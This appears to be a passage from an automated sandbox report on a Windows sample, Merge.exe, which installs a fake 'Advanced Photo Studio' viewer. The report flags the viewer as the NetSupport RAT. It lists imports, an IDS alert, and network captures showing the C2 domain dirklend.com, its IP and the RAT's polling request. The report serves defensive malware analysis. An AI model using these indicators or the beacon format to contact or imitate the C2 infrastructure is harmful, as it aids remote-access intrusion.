                                                                                                  RT_ICON0x10834140x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishGreat Britain0.15191067254490043
                                                                                                  RT_ICON0x10c543c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.3013485477178423
                                                                                                  RT_ICON0x10c79e40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.27110694183864914
                                                                                                  RT_ICON0x10c8a8c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.34574468085106386
                                                                                                  RT_RCDATA0x10c8ef40x1a59cc0data1.0003108978271484
                                                                                                  RT_GROUP_ICON0x2b22bb40x92dataEnglishGreat Britain0.6301369863013698
                                                                                                  RT_GROUP_ICON0x2b22c480x92dataEnglishGreat Britain0.6301369863013698
                                                                                                  RT_GROUP_ICON0x2b22cdc0x92dataEnglishGreat Britain0.6438356164383562
                                                                                                  RT_VERSION0x2b22d700x3e4dataEnglishGreat Britain0.44879518072289154
                                                                                                  RT_MANIFEST0x2b231540x31cXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (736), with CRLF line terminatorsEnglishUnited States0.5238693467336684

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  KERNEL32.dllCreateEventA, RemoveDirectoryW, GetThreadContext, SetThreadContext, CreateIoCompletionPort, FormatMessageA, GetTempFileNameW, SleepEx, lstrcpyW, WideCharToMultiByte, GlobalMemoryStatusEx, DeleteCriticalSection, LocalFree, QueueUserAPC, FindResourceW, LoadResource, CloseHandle, GlobalAlloc, LockResource, TerminateThread, SetEvent, GetLastError, FormatMessageW, WriteConsoleW, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, HeapFree, HeapAlloc, HeapSize, CreateEventW, PostQueuedCompletionStatus, WaitForSingleObject, FindClose, GetTempPathW, EnumResourceNamesW, GetEnvironmentVariableW, GetQueuedCompletionStatus, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, WaitForMultipleObjects, EnumResourceTypesW, CreateWaitableTimerW, lstrlenW, EnterCriticalSection, SetLastError, SetWaitableTimer, FindFirstFileW, SizeofResource, CreateDirectoryW, InitializeCriticalSectionEx, InitializeConditionVariable, InitOnceBeginInitialize, InitOnceComplete, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableCS, WaitForSingleObjectEx, SetThreadPriority, GetFileAttributesW, CreateFile2, MultiByteToWideChar, IsValidCodePage, GetACP, GetOEMCP, CreateFileA, CreateFileW, GetFileAttributesA, GetFileInformationByHandle, GetFileType, GetFullPathNameW, ReadFile, WriteFile, PeekNamedPipe, GetExitCodeProcess, Sleep, GetStdHandle, SearchPathA, DuplicateHandle, SetHandleInformation, CreatePipe, GetCurrentProcess, CreateProcessA, OpenProcess, GetProcAddress, LoadLibraryA, InitializeSRWLock, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, SleepConditionVariableSRW, GetCurrentThread, GetThreadGroupAffinity, GetModuleHandleW, ReleaseSRWLockShared, AcquireSRWLockShared, GetCurrentThreadId, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleExW, InitializeCriticalSection, ReleaseSemaphore, GetExitCodeThread, CreateSemaphoreA, GetSystemInfo, VirtualFree, GetCurrentProcessId, GetSystemTimeAsFileTime, GetSystemTime, SystemTimeToFileTime, GetSystemDirectoryA, FreeLibrary, LoadLibraryW, FindNextFileW, GetConsoleMode, SetConsoleMode, ReadConsoleA, ReadConsoleW, QueryPerformanceCounter, GetTickCount, QueryPerformanceFrequency, GetSystemDirectoryW, GetModuleHandleA, MoveFileExW, GetEnvironmentVariableA, VerSetConditionMask, VerifyVersionInfoW, GetFileSizeEx, PulseEvent, GetDiskFreeSpaceW, SetFilePointer, GetVersion, GetVersionExW, FlushFileBuffers, DeleteFileW, MoveFileW, CreateFileMappingW, OpenFileMappingW, MapViewOfFile, UnmapViewOfFile, SetEndOfFile, SignalObjectAndWait, ResetEvent, ReleaseMutex, CreateMutexW, CreateThread, LockFile, LockFileEx, UnlockFile, GetShortPathNameW, GetModuleFileNameW, GetHandleInformation, GetQueuedCompletionStatusEx, InitOnceExecuteOnce, GetTickCount64, SetFileCompletionNotificationModes, RaiseException, GetLocaleInfoEx, GetStringTypeW, TryAcquireSRWLockExclusive, GetCurrentDirectoryW, FindFirstFileExW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, EncodePointer, DecodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, InterlockedPushEntrySList, LoadLibraryExW, ExitProcess, ExitThread, FreeLibraryAndExitThread, SetConsoleCtrlHandler, SetStdHandle, SetFilePointerEx, GetDriveTypeW, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetTimeZoneInformation, GetConsoleOutputCP, HeapReAlloc
                                                                                                  USER32.dllGetCursorPos, GetProcessWindowStation, MessageBoxW, GetUserObjectInformationW, GetSystemMetrics
                                                                                                  SHELL32.dllShellExecuteW
                                                                                                  WS2_32.dllfreeaddrinfo, getaddrinfo, __WSAFDIsSet, WSAIoctl, inet_ntop, inet_pton, gethostname, WSARecv, WSASend, WSAWaitForMultipleEvents, WSAEventSelect, WSAEnumNetworkEvents, WSACreateEvent, WSACloseEvent, sendto, recvfrom, getpeername, WSASendTo, socket, ntohl, listen, connect, closesocket, bind, accept, send, recv, WSASetLastError, getservbyname, getservbyport, gethostbyaddr, inet_ntoa, inet_addr, htons, htonl, WSAGetLastError, gethostbyname, select, ntohs, getsockopt, getsockname, ioctlsocket, WSACleanup, WSAStartup, setsockopt, WSARecvFrom, shutdown
                                                                                                  bcrypt.dllBCryptGenRandom
                                                                                                  SHLWAPI.dllPathFileExistsW
                                                                                                  CRYPT32.dllCertCloseStore, CertEnumCertificatesInStore, CertFindCertificateInStore, CertDuplicateCertificateContext, CertFreeCertificateContext, CertGetCertificateContextProperty, CertOpenSystemStoreW, CryptStringToBinaryW, PFXImportCertStore, CryptDecodeObjectEx, CertAddCertificateContextToStore, CertFindExtension, CertGetNameStringW, CryptQueryObject, CertCreateCertificateChainEngine, CertFreeCertificateChainEngine, CertFreeCertificateChain, CertGetCertificateChain, CertOpenStore
                                                                                                  ADVAPI32.dllCryptEncrypt, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CryptImportKey, CryptHashData, CryptGetHashParam, CryptEnumProvidersW, CryptSignHashW, CryptDestroyHash, CryptCreateHash, CryptDecrypt, CryptExportKey, CryptGetUserKey, CryptGetProvParam, CryptSetHashParam, CryptDestroyKey, CryptAcquireContextW, ReportEventW, RegisterEventSourceW, DeregisterEventSource, CryptReleaseContext, CryptGenRandom

                                                                                                  Possible Origin

                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishGreat Britain
                                                                                                  EnglishUnited States

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-12-15T11:50:17.359236+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.449899162.33.178.193443TCP

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 15, 2024 11:52:12.519001961 CET4989880192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:12.640924931 CET8049898104.26.1.231192.168.2.4
                                                                                                  Dec 15, 2024 11:52:12.642544031 CET4989880192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:12.642656088 CET4989880192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:12.754148006 CET49899443192.168.2.4162.33.178.193
                                                                                                  Dec 15, 2024 11:52:12.754251003 CET44349899162.33.178.193192.168.2.4
                                                                                                  Dec 15, 2024 11:52:12.754493952 CET49899443192.168.2.4162.33.178.193
                                                                                                  Dec 15, 2024 11:52:12.762492895 CET8049898104.26.1.231192.168.2.4
                                                                                                  Dec 15, 2024 11:52:12.812906981 CET49899443192.168.2.4162.33.178.193
                                                                                                  Dec 15, 2024 11:52:12.812959909 CET44349899162.33.178.193192.168.2.4
                                                                                                  Dec 15, 2024 11:52:12.813118935 CET44349899162.33.178.193192.168.2.4
                                                                                                  Dec 15, 2024 11:52:13.926822901 CET8049898104.26.1.231192.168.2.4
                                                                                                  Dec 15, 2024 11:52:13.933886051 CET4989880192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:13.954395056 CET4989880192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:13.954395056 CET4989880192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:13.956398964 CET4990280192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:14.076771021 CET8049902104.26.1.231192.168.2.4
                                                                                                  Dec 15, 2024 11:52:14.090727091 CET4990280192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:14.117469072 CET4990280192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:14.239989042 CET8049902104.26.1.231192.168.2.4
                                                                                                  Dec 15, 2024 11:52:15.386241913 CET8049902104.26.1.231192.168.2.4
                                                                                                  Dec 15, 2024 11:52:15.386334896 CET4990280192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:15.386570930 CET4990280192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:15.386590004 CET4990280192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:15.387178898 CET4990680192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:15.507354975 CET8049906104.26.1.231192.168.2.4
                                                                                                  Dec 15, 2024 11:52:15.507520914 CET4990680192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:15.507668018 CET4990680192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:15.627430916 CET8049906104.26.1.231192.168.2.4
                                                                                                  Dec 15, 2024 11:52:16.788511038 CET8049906104.26.1.231192.168.2.4
                                                                                                  Dec 15, 2024 11:52:16.788628101 CET4990680192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:16.788922071 CET4990680192.168.2.4104.26.1.231
                                                                                                  Dec 15, 2024 11:52:16.788937092 CET4990680192.168.2.4104.26.1.231

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 15, 2024 11:52:12.374145985 CET4980253192.168.2.41.1.1.1
                                                                                                  Dec 15, 2024 11:52:12.377563953 CET5036353192.168.2.41.1.1.1
                                                                                                  Dec 15, 2024 11:52:12.515016079 CET53503631.1.1.1192.168.2.4
                                                                                                  Dec 15, 2024 11:52:12.752943993 CET53498021.1.1.1192.168.2.4

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 15, 2024 11:52:12.374145985 CET192.168.2.41.1.1.10x4886Standard query (0)dirklend.comA (IP address)IN (0x0001)false
                                                                                                  Dec 15, 2024 11:52:12.377563953 CET192.168.2.41.1.1.10xe9a3Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 15, 2024 11:52:12.515016079 CET1.1.1.1192.168.2.40xe9a3No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                  Dec 15, 2024 11:52:12.515016079 CET1.1.1.1192.168.2.40xe9a3No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                  Dec 15, 2024 11:52:12.515016079 CET1.1.1.1192.168.2.40xe9a3No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                  Dec 15, 2024 11:52:12.752943993 CET1.1.1.1192.168.2.40x4886No error (0)dirklend.com162.33.178.193A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • geo.netsupportsoftware.com
                                                                                                  • 162.33.178.193connection: keep-alivecmd=pollinfo=1ack=1

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.449898104.26.1.231807172C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 15, 2024 11:52:12.642656088 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                  Host: geo.netsupportsoftware.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Dec 15, 2024 11:52:13.926822901 CET1127INHTTP/1.1 404 Not Found
                                                                                                  Date: Sun, 15 Dec 2024 10:52:13 GMT
                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: keep-alive
                                                                                                  CF-Ray: 8f25e208daec7288-EWR
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  cf-apo-via: origin,host
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNXmWPG%2F6Dq5R%2F4ZEoMaF9oLjqPXm34rnDVZguNM7OluRroJZuAWpiOjgDwTo%2B4Vw6jzV6Xb2inH2L2UrorDzo6J4lQWh2YTEuedgUN%2F6yJxmD79lvIWgIra4bITDqLcGuygIZSbphlZ%2BkIP"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1776&rtt_var=888&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.449899162.33.178.1934437172C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 15, 2024 11:52:12.812906981 CET220OUTPOST http://162.33.178.193/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 162.33.178.193Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                  Data Raw:
                                                                                                  Data Ascii:


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.449902104.26.1.231807172C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 15, 2024 11:52:14.117469072 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                  Host: geo.netsupportsoftware.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Dec 15, 2024 11:52:15.386241913 CET1121INHTTP/1.1 404 Not Found
                                                                                                  Date: Sun, 15 Dec 2024 10:52:15 GMT
                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: keep-alive
                                                                                                  CF-Ray: 8f25e211eecc4249-EWR
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  cf-apo-via: origin,host
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ALUFSQNFoukbYkXXIt%2BhnFA8OqZk2wY7eNhm8fxtS4SCnTzDHmaGGJEsJejuPd4vvZHWfm4DfFjgniJuEnObPMNt8u8LLBIJPlKB5lEVXz8QoDCHQMzna3lXhZHO4JBKqxSnVB0KMcZgWt%2FT"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1622&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.449906104.26.1.231807172C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 15, 2024 11:52:15.507668018 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                  Host: geo.netsupportsoftware.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Dec 15, 2024 11:52:16.788511038 CET1119INHTTP/1.1 404 Not Found
                                                                                                  Date: Sun, 15 Dec 2024 10:52:16 GMT
                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: keep-alive
                                                                                                  CF-Ray: 8f25e21ab89c4338-EWR
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  cf-apo-via: origin,host
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jfYwYM9bxyLZTHQnZA2iLjiXKPbdYJRQgd0fczWeQrQSQ8pNzzvTM0BSEPWP317mfIOQaCJv1OHZAmuj2ceaUiII%2B3ZCffGWpqH5d1pmvrkbb6MbyfXeeNAfigEYYKeIxnbP9M63rjEnrMmR"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:05:50:20
                                                                                                  Start date:15/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Merge.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Merge.exe"
                                                                                                  Imagebase:0xde0000
                                                                                                  File size:44'935'240 bytes
                                                                                                  MD5 hash:D024FF2FC7ACB7C172F0BA38A9FBC2C3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:05:51:30
                                                                                                  Start date:15/12/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
                                                                                                  Imagebase:0xae0000
                                                                                                  File size:7'058'272 bytes
                                                                                                  MD5 hash:F78F5CC0A0B3AF7AF5485BB47B4809C0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951937785.000000000A642000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3122142214.000000000A63B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3110032044.0000000005866000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2627011351.0000000007AED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3122142214.000000000A624000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951725255.000000000A777000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
